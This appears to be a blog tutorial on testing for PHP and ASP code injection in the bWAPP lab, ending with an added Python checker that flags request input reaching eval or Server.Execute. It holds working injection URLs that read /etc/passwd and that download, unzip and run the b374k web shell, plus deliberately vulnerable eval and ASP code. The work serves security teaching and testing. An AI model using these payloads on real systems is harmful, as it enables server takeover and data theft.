Code injection – All things in moderation

Code injection




  • Source: OWASP
  • Code injection is the exploitation of a computer bug that makes it possible to enter code as input to a web page and have it executed by the web server. In code injection testing, a tester submits input that is processed by the web server as dynamic code or as an included file. These tests can target various server-side scripting engines, e.g., ASP or PHP.
  • Testing for PHP injection vulnerabilities
    • Using the query string, the tester can inject code (in this example, a malicious URL) to be processed as part of the included file. Example from the bWAPP lab:
      - Inject dynamic code:
      http://192.168.5.161/bWAPP/phpi.php?message=print%28shell_exec%28%27cat%20/etc/passwd%27%29%29;
      - Inject include file:
      Upload shell:
      http://192.168.5.161/bWAPP/phpi.php?message=exec('wget https://github.com/b374k/b374k/archive/master.zip');
      Unzip:
      http://192.168.5.161/bWAPP/phpi.php?message=exec%28%27unzip%20master.zip%20-d%20b374k%27%29;
      Run shell:
      http://192.168.5.161/bWAPP/b374k/b374k-master/
      Source that executes the query string:

       <p><i><?php @eval ("echo " . $_REQUEST["message"] . ";");?></i></p>

  • Testing for ASP code injection vulnerabilities
    Examine ASP code for user input used in execution functions. Can the user enter commands into the Data input field? Here, the ASP code will save the input to a file and then execute it:

    <%
    If not isEmpty(Request( "Data" ) ) Then
    Dim fso, f
    'User input Data is written to a file named data.txt
    Set fso = CreateObject("Scripting.FileSystemObject")
    Set f = fso.OpenTextFile(Server.MapPath( "data.txt" ), 8, True)
    f.Write Request("Data") & vbCrLf
    f.close
    Set f = nothing
    Set fso = Nothing
    
    'Data.txt is executed
    Server.Execute( "data.txt" )
    
    Else
    %>
    <form>
    <input name="Data" /><input type="submit" name="Enter Data" />
    </form>
    <%
    End If
    %>
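
The review step described above (look for user input used in execution functions), as an added example that is not part of the original post: a small Python check that flags lines where request input can reach a code-execution function. It runs on the page's PHP line, a constructed hardened variant, and a shortened copy of the ASP listing; the name `review`, the sink lists and the `direct`/`indirect` labels are assumptions of this sketch, and the line-level matching is a heuristic.

```python
import re

# Request-controlled input (sources) and code-execution functions (sinks).
SOURCE = {
    "php": re.compile(r"\$_(?:REQUEST|GET|POST|COOKIE)\b"),
    "asp": re.compile(r"\bRequest\s*(?:\.\s*\w+\s*)?\(", re.I),
}
SINK = {
    "php": re.compile(r"\b(?:eval|assert|include(?:_once)?|require(?:_once)?)\b", re.I),
    "asp": re.compile(r"\b(?:Server\s*\.\s*Execute|ExecuteGlobal|Execute|Eval)\b", re.I),
}
COMMENT = ("'", "//", "#")

# Constructed samples: the page's PHP line, a hardened variant, and a
# shortened copy of the page's ASP listing.
PHP_PAGE = '<p><i><?php @eval ("echo " . $_REQUEST["message"] . ";");?></i></p>'
PHP_FIXED = ('<p><i><?php echo htmlspecialchars($_REQUEST["message"], '
             'ENT_QUOTES, "UTF-8"); ?></i></p>')
ASP_PAGE = """<%
Set f = fso.OpenTextFile(Server.MapPath("data.txt"), 8, True)
f.Write Request("Data") & vbCrLf
'Data.txt is executed
Server.Execute("data.txt")
%>
"""


def review(source):
    """Return (line_no, sink, kind) for each sink that request input may reach."""
    lang = "php" if "<?php" in source else "asp"
    code = [(n, l.strip()) for n, l in enumerate(source.splitlines(), 1)]
    code = [(n, l) for n, l in code if l and not l.startswith(COMMENT)]
    reads_request = any(SOURCE[lang].search(l) for _, l in code)
    findings = []
    for n, l in code:
        m = SINK[lang].search(l)
        if not m:
            continue
        if SOURCE[lang].search(l):
            findings.append((n, m.group(0), "direct"))    # input on the sink line
        elif reads_request:
            findings.append((n, m.group(0), "indirect"))  # trace by hand
    return findings


if __name__ == "__main__":
    for name in ("PHP_PAGE", "PHP_FIXED", "ASP_PAGE"):
        print(name, review(globals()[name]))
```

An `indirect` finding, as in the ASP listing, means the sink runs a file or variable rather than the request value itself, so the path from `Request("Data")` to `data.txt` still has to be confirmed by reading the code.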
    
